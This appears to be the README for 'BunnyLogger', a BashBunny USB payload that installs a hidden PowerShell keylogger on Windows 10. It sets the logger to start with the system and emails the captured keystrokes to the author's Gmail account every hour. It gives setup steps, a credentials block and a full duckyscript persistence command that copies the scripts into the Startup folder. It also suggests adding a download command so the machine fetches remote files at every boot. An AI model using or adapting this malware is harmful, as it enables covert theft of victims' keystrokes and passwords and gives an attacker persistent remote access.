Chris Taylor [Blue Cosmo] | 08/24/21
__________ .____
\______ \__ __ ____ ____ ___.__.| | ____ ____ ____ ___________
| | _/ | \/ \ / < | || | / _ \ / ___\ / ___\_/ __ \_ __ \
| | \ | / | \ | \___ || |__( <_> ) /_/ > /_/ > ___/| | \/
|______ /____/|___| /___| / ____||_______ \____/\___ /\___ / \___ >__|
\/ \/ \/\/ \/ /_____//_____/ \/
An New Version of This Payload Is Available HERE
BunnyLogger is a BashBunny payload that uses PowerShell to log keystrokes
- moves c.cmd file to windows startup directory
- c.cmd will secretly run p.ps1
- p.ps1 will log keystrokes
- l.ps1 will email the logs every startup and every hour [via SMTP]
- sends logs hourly, regardless of system time
- Gmail account
- i suggest making a separate Gmail account for this payload
- your Gmail must have LSA Access enabled
- Windows 10 Target
Set-Up/Installation
- change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"- in line 7 of duckyscript.txt, change 'switch1' to whatever switch you use
- in line 7 of duckyscript.txt, change 'BashBunny' to the name of your BashBunny
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";The c.cmd attack opportunity
the c.cmd file runs every startup.
this means an attacker could place a
'wget' or 'Invoke-WebRequest' and have a file
be downloaded from anywhere on the internet onto the computer.
the file would then save in the startup directory,
allowing it to run every startup
- hope you enjoy the payload!!
- please subscribe to my YouTube channel :)